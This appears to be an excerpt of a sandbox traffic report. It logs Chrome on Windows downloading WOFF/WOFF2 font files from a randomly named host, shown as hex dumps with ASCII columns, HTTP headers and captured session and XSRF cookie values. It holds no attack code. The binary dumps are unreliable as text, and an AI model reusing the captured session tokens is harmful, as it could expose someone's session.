                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mX3Yq4Ds%2Bw8Hc8hn93yW5ki5vJZ9nkki0gD13lwAVkOF0rgsRUEyYNxBcIdJLMZXuShk97d0uRdSunmrtOfOCrWtzSHTd1Ikzw8Ab5SBDa2Y5YqDZwCoBqcdHfsxwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e00600cde7cf6-EWR
                          2024-05-22 15:57:22 UTC748INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                          Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                          2024-05-22 15:57:22 UTC1369INData Raw: 9e 7f f7 d3 db e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2 c8 93 7a
                          Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ Xz
                          2024-05-22 15:57:22 UTC1369INData Raw: 69 9d 44 eb 95 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a 03 cd 24
                          Data Ascii: iD0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I$
                          2024-05-22 15:57:22 UTC1369INData Raw: bf fc 8c 82 bb fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46 78 01 9d
                          Data Ascii: ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCFx
                          2024-05-22 15:57:22 UTC1369INData Raw: 5f 5d ca 6d 2a c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d bf 4e 8d
                          Data Ascii: _]m*,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`npN
                          2024-05-22 15:57:22 UTC1369INData Raw: 05 2e 44 bf ef c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06 0f be ed
                          Data Ascii: .D^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=
                          2024-05-22 15:57:22 UTC1369INData Raw: 89 d1 1b ab 7b 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f 53 e8 7a
                          Data Ascii: {CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=oSz
                          2024-05-22 15:57:22 UTC1369INData Raw: ab af a9 57 67 f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d 57 f1 64
                          Data Ascii: WgQa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=Wd
                          2024-05-22 15:57:22 UTC1369INData Raw: 8a fb 19 1b 9a 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc 92 41 35
                          Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2A5
                          2024-05-22 15:57:23 UTC1369INData Raw: 69 8b 41 c0 80 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70 3c ba 84 97 64 67 4b 73 47 73 22 75 e1 a6 a3 95 79 c9 7d 3a f9 6e a4 ea 9e bf 47 78 1c db ef 7d 70 0e 4a d9 66 b0 6f fb 0a db de d6 5b 5f a7 6d 6d aa e6 3b 4c 81 04 ba 0d be 91 ce 1f e7 b8 cc ce 72 36 ce 9f f8 4b 3e f6 63 d0 39 da 99 e1 24 58 ef ad ce 1d 15 87 68 95 9d 29 d7 2d 75 09 b7 74 bd 2b 99 86 a9 ef 3b 52 06 06 93 98 67 80 17 a1 24
                          Data Ascii: iAT;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p<dgKsGs"uy}:nGx}pJfo[_mm;Lr6K>c9$Xh)-ut+;Rg$


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.449776188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC1400OUTGET /23YPgTfaqT4mHAyzUabrdJNFlqxy69 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://oknya83345.eleteriod.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:22 UTC626INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:22 GMT
                          Content-Type: font/woff
                          Content-Length: 36696
                          Connection: close
                          Content-Disposition: inline; filename="23YPgTfaqT4mHAyzUabrdJNFlqxy69"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrQRrbxuJt0nCc%2F0whCxR4ui8MGYmopNzdBp014K6PSM19Dxdz%2BeRA6oUCnmAo9h56nuzVpPPS7rqapuov7j8owwGTGd%2B%2FIGaov4CUtfcZBVReTuPQizvasz3mLEkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0060e9b71889-EWR
                          2024-05-22 15:57:22 UTC743INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                          Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                          2024-05-22 15:57:22 UTC1369INData Raw: 4c ba 90 ee a5 9f 20 67 2a 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56 ab d5 a7 6a 8d 5a ab d6 a9 f5 6a a3 da 42 4a bd ca 5f 50 77 ca e3 30 f5 e2 66 2a 00 8f 96 71 13 95 f0 71 35 96 f7 aa 27 b9 46 3d 4d 49 6a 02 37 a8 e7 91 5e e0 66 f5 22 87 d5 4b 5c a1 a6 70 48 4d 43 de 74 a4 57 b9 5a cd 42 7a 9d eb d5 6c 94 2b c6 b3 b5 d4 85 ce 01 65 7c a0 8d 0f b5 1e a5 42 3e 8e 9a 0f a9 31 a8 61 2c f5 44 ed 45 6a 1c e5 a8 a7
                          Data Ascii: L g*Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*VjZjBJ_Pw0f*qq5'F=MIj7^f"K\pHMCtWZBzl+e|B>1a,DEj
                          2024-05-22 15:57:22 UTC1369INData Raw: 17 bd 07 be a8 a9 00 2d 3a 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23 2d 43 fa 00 e9 23 3c d7 5a b0 1a e9 53 d4 8f 5e 2b 44 95 6a 23 d2 56 cd 69 60 9a 05 8c 2c 48 45 12 da 1b 83 de 2a b5 1c 12 aa 5c 49 a8 43 cf ab 5d 39 3a 6c ee 2c 91 23 94 c2 73 4d 5d 0b 3c b2 0c 7d d2 9d a7 f0 54 bd 78 ab a3 2d 42 73 e5 bc c7 db 28 69 e8 49 1d e1 0e 9b 78 fb 40 7a 88 ee 43 9c 7c 14 3c 48 e2 30 b0 b0 50 3e 85 9b 00 90 39 66 ae
                          Data Ascii: -:Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#-C#<ZS^+Dj#Vi`,HE*\IC]9:l,#sM]<}Tx-Bs(iIx@zC|<H0P>9f
                          2024-05-22 15:57:22 UTC1369INData Raw: cc 2c 49 c7 f0 4d 56 64 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d 49 32 eb 54 3a bf 41 ae cc 6c 1f 3c b0 de 37 67 8f 01 8f 00 b7 9a d8 75 4d ae b4 25 0e 6d c9 3b f6 1e 10 a1 d8 5e b4 54 8d f4 85 ec 5f 3c c5 11 ab 67 ec 5a a7 77 cc a0 be 2e da da c8 b5 a6 d6 49 b3 93 c6 2e d5 d8 b6 7c b8 e5 6a 65 1e 2d 26 9e 73 c6 8d ba d7 72 11 33 17 78 ea 78 9b f2 7a bd 63 8f e7 be d6 9e 05 06 7e 56 cb f9 53 af e7 75 f5 d5
                          Data Ascii: ,IMVd>#4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9I2T:Al<7guM%m;^T_<gZw.I.|je-&sr3xxzc~VSu
                          2024-05-22 15:57:22 UTC1369INData Raw: 16 43 32 a2 ac 89 1e 6d 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac fc 49 8d 8d 1a e2 cf e2 c4 e7 7f 04 5b 89 fb 43 d1 f2 e2 8e f9 8e da 56 c1 9e 6f 30 cf f6 9d de 6c 27 de 0b c0 7b d6 e9 55 03 53 4b 46 dc 79 a3 06 ef de 88 a8 16 bc 71 e4 0e 89 15 da 90 f5 76 e5 3d e8 ed 4d d4 ea 96 2f 6e 44 fe 1c 6c c5 94 f8 6b ab a2 c9 2d f7 76 46 bc 59 93 3b f7 a7 ef 8b f8 9d f6 c6 98 ed e4 57 23 a6 aa 8e b6 ef 90 f6 da d6
                          Data Ascii: C2m{1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFgI[CVo0l'{USKFyqv=M/nDlk-vFY;W#
                          2024-05-22 15:57:22 UTC1369INData Raw: 23 80 8f 03 a3 a5 9d 78 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db 4c bb 67 9b ef 91 cf d2 91 9c 1c ff 24 a0 b5 74 03 28 ab 50 d3 19 48 fd dd 73 92 b9 b3 ef 75 3a 07 ba da 43 fe 97 ef 7c e8 aa 4f 56 06 94 bc d9 1f cf 73 64 9d f3 76 48 59 7f c1 aa 7f 14 a8 36 41 d7 e4 40 ff 56 a1 ad 12 49 1e 7c e3 bd 13 0b dd 4d fe 39 2e 24 0b f4 68 03 2c 03 29 2e f8 0c e8 9a fc a0 71 2a 24 40 ff 3b e4 b9 b8 d6 2b d1 67 02 ce
                          Data Ascii: #xp\ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:KLg$t(PHsu:C|OVsdvHY6A@VI|M9.$h,).q*$@;+g
                          2024-05-22 15:57:22 UTC1369INData Raw: da 3a bd 9d 0f 9c 63 21 39 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6 39 be 70 5f 15 5f 75 5f 1d 9f eb 6b e6 eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18 37 d1 9d e6 2e 74 d3 dd e5 6e 96 9b e3 e6 b9 7b dc 7c f7 47 f7 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01
                          Data Ascii: :c!9!n;.v3*wt^Mz>/kub/EEFENL9p__u_k=x{VeYlhqhAn/L`FrXz+t3ND-NA7.tn{|GWyj/_uU`R.MM/X:Q+T"#Pc~2c?uI
